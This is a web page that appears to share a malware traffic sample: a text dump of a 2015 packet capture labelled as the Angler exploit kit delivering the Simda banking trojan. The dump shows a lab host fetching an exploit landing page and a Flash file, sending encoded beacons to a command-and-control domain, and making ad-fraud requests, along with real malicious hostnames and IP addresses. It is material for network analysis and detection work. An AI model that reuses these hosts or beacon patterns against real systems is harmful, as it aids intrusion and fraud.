Text Example

Angler Exploit Kit EK Deliver Simda Malware Banking Trojan PCAP file download traffic sample

Download Attachments

  • 1 pcap 38
    Date added: May 24, 2019 12:01 am Added by: admin File size: 2 MB Downloads: 11

2015-03-27 11:14:44.276370 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(.A@….O..z”..D..).P.Cy…..P………….
2015-03-27 11:14:44.283482 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 1:356, ack 1, win 256, length 355: HTTP: GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
E….K@…….z”..D..).P.Cy…..P….;..GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: [[[[[[[[[ redacted ]]]]]]]]]]
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive

2015-03-27 11:14:44.539699 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], ack 356, win 123, length 0

2015-03-27 11:14:46.115369 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 95637, win 256, length 0
E..(..@…….z”..D..).P.C{…5 P…y………
2015-03-27 11:14:47.983190 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 356:767, ack 95637, win 256, length 411: HTTP: GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
E…..@…….z”..D..).P.C{…5 P…Ba..GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://kiyoshi.noahsbootandshoerepair.com/closers_retrenchment_delineation/6715645798
x-flash-version: 13,0,0,182
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive


2015-03-27 11:14:48.180800 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(..@….v..z”..D..6.P…5..BDP….”……..
2015-03-27 11:14:48.181788 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [P.], seq 1:133, ack 1, win 256, length 132: HTTP: GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
E…..@…….z”..D..6.P…5..BDP…….GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
Connection: Keep-Alive
Host: kiyoshi.noahsbootandshoerepair.com

2015-03-27 11:14:48.207298 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], seq 95637:97004, ack 767, win 131, length 1367: HTTP: HTTP/1.1 200 OK
E….&@.2.X…D…z”.P.)..5 .C|.P…e…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 27 Mar 2015 15:14:48 GMT
Content-Type: application/x-shockwave-flash

Content-Length: 52272

2015-03-27 11:14:52.508197 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [.], ack 1, win 256, length 0
E..(..@….[..z”.q…C.P=.,.u..RP….a……..
2015-03-27 11:14:52.509414 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [P.], seq 1:101, ack 1, win 256, length 100: HTTP: POST /timezone/0/0 HTTP/1.1
E…..@…….z”.q…C.P=.,.u..RP…I#..POST /timezone/0/0 HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.earthtools.org

2015-03-27 11:14:52.845296 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [.], ack 101, win 115, length 0
E..(7E@./.&..q….z”.P.Cu..R=.,iP..s….
2015-03-27 11:14:52.845577 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [P.], seq 1:696, ack 101, win 115, length 695: HTTP: HTTP/1.1 200 OK
E…7F@./.#..q….z”.P.Cu..R=.,iP..s….HTTP/1.1 200 OK

Date: Fri, 27 Mar 2015 15:14:52 GMT

2015-03-27 11:14:53.309622 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [.], ack 1, win 256, length 0
E..(..@…k…z”.%8..D.P/……SP…O………
2015-03-27 11:14:53.310410 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [P.], seq 1:126, ack 1, win 256, length 125: HTTP: POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
E…..@…j…z”.%8..D.P/……SP…X…POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.ecb.europa.eu

2015-03-27 11:14:53.478277 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], ack 126, win 457, length 0
E..(..@.9..F.%8…z”.P.D…S/…P…N…
2015-03-27 11:14:53.578255 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], seq 1:1368, ack 126, win 457, length 1367: HTTP: HTTP/1.1 200 OK
E…..@.9….%8…z”.P.D…S/…P…f…HTTP/1.1 200 OK

Server: Apache/2.2.3 (Linux/SUSE)

2015-03-27 11:14:58.577462 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….{..z”U.h..L.P.B.~6t..P…Ik……..
2015-03-27 11:14:58.578833 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..L.P.B.~6t..P….Y..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 216
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:14:58.579133 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 136:352, ack 1, win 256, length 216: HTTP
E…..@…….z”U.h..L.P.B..6t..P…k…SNE1dax2kTrCO0/dykZ+x8JvoeshsqxF8Bud4at1aDiBWU9qB6+uhOMFH98SexCc+vJywoAb8HQv8VDbLgLc25bZvceJUzuvnAqW58q0Pwbl5Z2luX50C3YR+Ef3gJUBFHY5k6LtQ0Uxou9+4TQEZzORJaqZn7WT9wqKE1eM8LYMnmPmnpobOT6M3r+PF5oJnTmoAQ1EthyxMm7LjPYf2g==

2015-03-27 11:14:58.778906 IP 85.25.104.159.80 > 192.168.122.34.49228: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:00.349286 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….@..z”U.h..N.P…H.1..P….i……..
2015-03-27 11:15:00.350212 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…H.1..P….R..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 172
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:00.350542 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 136:308, ack 1, win 256, length 172: HTTP
E…..@…….z”U.h..N.P…..1..P…….YD4viggOIh++07v2Um1gIx11St/8XC8saF5uX0YI4AMVOHQ25cUjc+t23u3BZI27fiaqpkXY6wVteS6MqFLJlvHwM6fGGZVitbFgc8uerOJBrGG5iaFm5jNsDn5NWX3yyd0SwE47HcjkQ1DdnT7on0O8tT20+FuDVEr4npZm0eE=

2015-03-27 11:15:00.643584 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:03.031960 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 513599, win 1368, length 0
E..(..@….K..z”U.h..N.P…{.9..P..X……….
2015-03-27 11:15:03.227353 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 308:443, ack 513599, win 1368, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…{.9..P..X….POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 256
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:03.227511 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 443:699, ack 513599, win 1368, length 256: HTTP
E..(..@….I..z”U.h..N.P…..9..P..X….GpbZQGaQgmfu/Eh0mvebAJPknXzYE1Vhzceud0DQnHPICCkYG2flJ1aMWtq5BMcqrPr7wo7Fr53uEdowJXndCecd5Aj+eFv4Wsy43MaZDqFqB2/ld1bLXKa8U5EUlr8hLOsU8Q/e3pN/wf2SWbmmm5Rci6Hw1izzlJ/rY8zpaDl3n3E2sBtF6EX0+M1Eu4cE82G4ZcE3qY2Ld94kApgQVjW/Wu5p26YOwUZB2mTcGnM0AT0qyJzKE77lTaBJkHH1

2015-03-27 11:15:03.427513 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 443, win 140, length 0

2015-03-27 11:15:09.727441 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [.], ack 1, win 256, length 0
E..(..@…….z”…..Y.P…Gv.”.P………….
2015-03-27 11:15:09.727832 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [P.], seq 1:407, ack 1, win 256, length 406: HTTP: POST /news.php HTTP/1.0
E…..@…….z”…..Y.P…Gv.”.P…….POST /news.php HTTP/1.0
Host: fasion.arunthati.co.uk
Accept: /
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 698
Content-Type: application/octet-stream

2015-03-27 11:15:21.224812 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 834:1562, ack 742017, win 2002, length 728: HTTP
E…..@…….z”U.h..N.P…..=.GP…….GMXiXd49B5iwJApbnju5S7TSL4CBU0EaU8l0WQKCbWg7hAyhzQilFMKgOwfKOy6G0/g37ipDdpYCEc8PJiUaJv+IFR1a1HXiPDWzFglXeTnP7pjbGUKS9K0PXA1Uo1UZW6VEoKRn+ZuxvM3BRRdgzEM5CkIH42ZpivDhVkCJ4P6Fqp+v1Uz2f9aZgRrnxA62Gds9itsbdKPYGT5K1fBQ6Wj0DQpkzb8c+eC00w5gKkNTQFDdq12qhpnydU5RL3j05yepKyu42ZnRDyd8UL8nKYIX6cvW5XczXGHFk1egZtjW++YmsVW0A4c5mpPT+PRLb9keLQRqWKcLW+RCozgBstim7ha1Uxrer1RcT/FG+UUrzkybT57eDfTeZQJLRsti4ahtlgyCqMDCmACszLGlxrcK0xwFAoZ40HHqwL561H815gEsuwcrzrE/C1t2quC9AHtRWPE4jgy8VMFRRJ1EQzjBxNCayGsFGb+V/qvImKrK4hic42Q+32icspNkz36X6+bgARY0aQhQkru0lGh6e88mNvt+EIpim5UJDxgGHDpdT5KPK8ZNEC66aHNcieJgnUnXspdClizeGvuZ7TUCgWey/VOnkedLfJQrIgWunOqVTEQzpJZrBH1px1fajjriHVCy7aj+KcF2C1MLibl1xptPqfKNinoKDEG3SPjZiHkj5rwFy+bP6AcEGER4/TYvrUovM6nBajbHIQF3C7Iezw==

2015-03-27 11:15:21.368855 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 834, win 156, length 0

2015-03-27 11:18:03.853669 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( ‘@…….z”N.k…P..;x.R..P…)………
2015-03-27 11:18:03.854165 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… (@….#..z”N.k…P..;x.R..P….x..GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:04.090363 IP 85.25.107.67.80 > 192.168.122.34.49245: Flags [S.], seq 307298518, ack 567770301, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.0.D.U.kC..z”.P.].Q..!.|…r……..W…….
2015-03-27 11:18:04.090742 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [.], ack 1, win 256, length 0
E..( )@…….z”U.kC.].P!.|..Q..P…AC……..
2015-03-27 11:18:04.091262 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [P.], seq 1:174, ack 1, win 256, length 173: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… *@…….z”U.kC.].P!.|..Q..P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: sandsofafrica.net

2015-03-27 11:18:04.218709 IP 162.244.34.133.80 > 192.168.122.34.49246: Flags [S.], seq 2988324121, ack 1071872369, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.3.<…”…z”.P.^..5.?.yq..r……..W……. 2015-03-27 11:18:04.219113 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( +@….`..z”..”..^.P?.yq..5.P…MT……..
2015-03-27 11:18:04.219642 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [P.], seq 1:171, ack 1, win 256, length 170: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… ,@…….z”..”..^.P?.yq..5.P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: koreandust.com

2015-03-27 11:18:32.826046 IP 192.168.122.34.49263 > 136.243.241.27.80: Flags [P.], seq 1:469, ack 1, win 64249, length 468: HTTP: GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
E… .@…:n..z”…..o.P..N..<1.P….w..GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in/?22504744544b4d4e4356434c5643564b0c414d4f
x-flash-version: 13,0,0,182
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in
Connection: Keep-Alive


2015-03-27 11:18:33.183843 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( .@….>..z”N.k..q.P7AB.ZEr.P………….
2015-03-27 11:18:33.184137 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… .@…….z”N.k..q.P7AB.ZEr.P…)…GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:33.217857 IP 192.168.122.34.52660 > 224.0.0.252.5355: UDP, length 22
E..2 ……4..z”…………^…………wpad…..
2015-03-27 11:18:33.280227 IP 136.243.241.27.80 > 192.168.122.34.49264: Flags [.], ack 552, win 15400, length 0
E..(..@.3………z”.P.p.%..}X-P.<(.n..

2015-03-27 11:18:33.280608 IP 136.243.241.27.80 > 192.168.122.34.49263: Flags [.], seq 12518:13885, ack 469, win 15544, length 1367: HTTP

2015-03-27 11:18:35.340582 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( .@…….z”..”..r.P…..%..P………….
2015-03-27 11:18:35.340943 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [P.], seq 1:326, ack 1, win 256, length 325: HTTP: GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
E..m .@….v..z”..”..r.P…..%..P…g…GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
Accept: /
Referer: http://newblackfridayads.com/search.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: koreandust.com
Connection: Keep-Alive

Leave a Reply